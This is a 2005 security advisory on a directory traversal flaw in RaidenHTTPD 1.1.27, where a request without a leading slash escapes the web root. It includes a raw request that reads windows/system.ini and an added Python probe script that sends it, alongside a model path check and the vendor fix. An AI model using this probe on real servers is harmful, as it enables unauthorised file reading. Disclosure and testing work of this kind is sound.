RaidenHTTPD.txt

2005-02-06T00:00:00
ID PACKETSTORM:36042
Type packetstorm
Reporter Donato Ferrante
Modified 2005-02-06T00:00:00

Description

Donato Ferrante  
  
  
Application: RaidenHTTPD  
http://www.raidenhttpd.com/  
  
Version: 1.1.27  
  
Bug: directory traversal  
  
Date: 05-Feb-2005  
  
Author: Donato Ferrante  
e-mail: fdonato@autistici.org  
web: www.autistici.org/fdonato  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
1. Description  
2. The bug  
3. The code  
4. The fix  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
----------------  
1. Description:  
----------------  
  
Vendor's Description:  
  
"RaidenHTTPD is a full featured web server software for Windows 98/Me/  
2000/XP/2003 platforms."  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
------------  
2. The bug:  
------------  
  
By default the program has checks that reject malicious patterns such as  
"/../" in HTTP requests, but it does not correctly handle a request-target  
that lacks the initial "/". If you send a request like:  
  
> GET /somefile HTTP/1.1  
  
the web server returns the requested file if it exists in the  
DocumentRoot directory.  
  
  
But if you send a request like:  
  
> GET somefile HTTP/1.1  
  
the web server resolves the path relative to the root of the disk partition  
on which the httpd is installed, and returns the file if it exists there.  
Any file on that partition can therefore be requested without using a  
"/../" sequence at all, so the pattern check never triggers.  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
-------------  
3. The code:  
-------------  
  
To test the vulnerability, send a raw HTTP request to the server such as:  
  
GET windows/system.ini HTTP/1.1  
Host: localhost  
  
  
This will return the contents of Windows' system.ini if the HTTP server is  
installed on the same partition as Windows. The request has to be sent raw  
(for example over a plain TCP socket), because ordinary HTTP client libraries  
and browsers add the leading "/" to the request-target themselves.  
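The probe below is an added example written for this page; it is not code from the advisory author or the vendor. It builds the raw request exactly as shown above (no leading "/" is added), sends it over a plain TCP socket, and returns the status code and body. The host name, port and the `resolve_under_docroot` function are assumptions: the latter is a model of the check a server should perform (reject a target without a leading "/", normalise it, then confirm the result is still inside DocumentRoot) and is not RaidenHTTPD's actual fix. It assumes the request-target has already been percent-decoded.

```python
"""Raw-request probe for the leading-slash traversal described in this advisory.

Added example, not part of the original advisory. Normal HTTP client
libraries add or require the leading "/", so the probe writes the request
bytes to a socket directly. resolve_under_docroot() is a model of a correct
check, not the vendor's code; host/port values are placeholders.
"""
import posixpath
import socket
from typing import Optional, Tuple


def build_raw_request(target: str, host: str) -> bytes:
    """Return the raw request bytes. The target is used verbatim: no "/" is
    prepended, which is the whole point of the probe."""
    return (
        f"GET {target} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


def parse_status(response_head: bytes) -> int:
    """Extract the numeric status code from the first line of a response."""
    status_line = response_head.split(b"\r\n", 1)[0]
    parts = status_line.split()
    if len(parts) < 2 or not parts[1].isdigit():
        raise ValueError(f"malformed status line: {status_line!r}")
    return int(parts[1])


def probe(host: str, port: int = 80, target: str = "windows/system.ini",
          timeout: float = 5.0) -> Tuple[int, bytes]:
    """Send the raw request and return (status code, body).
    Requires a reachable server; not exercised by the offline test."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_raw_request(target, host))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    response = b"".join(chunks)
    head, _, body = response.partition(b"\r\n\r\n")
    return parse_status(head), body


def resolve_under_docroot(target: str, docroot: str) -> Optional[str]:
    """Model of a correct check (assumption, not the vendor's fix).

    A bare blacklist of "/../" is not enough: a target without a leading "/"
    never contains that pattern yet escapes DocumentRoot. So: require the
    leading "/", normalise away "." and ".." first, and only then join with
    docroot and verify the result still lies inside it. Returns the resolved
    path or None when the request must be rejected. Assumes the target is
    already percent-decoded and uses "/" separators.
    """
    if not target.startswith("/"):
        return None
    # normpath collapses ".", ".." and duplicate slashes; with a leading "/"
    # it can never produce a path above the root.
    normalised = posixpath.normpath(target)
    base = docroot.rstrip("/")
    candidate = posixpath.join(base, normalised.lstrip("/"))
    # Belt-and-braces prefix check on the final path.
    if candidate != base and not candidate.startswith(base + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # Placeholder target host; replace with the system under test.
    status, body = probe("localhost", 80)
    print(status)
    print(body.decode("latin-1", errors="replace"))
```

Run it against a lab host only; a 200 response carrying an INI file for a target that never started with "/" confirms the behaviour described above. The same raw-socket approach is how you should verify the fixed version, since a normalising client would mask the result.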
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
------------  
4. The fix:  
------------  
  
The vendor was contacted.  
The bug is fixed in version 1.1.31.  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  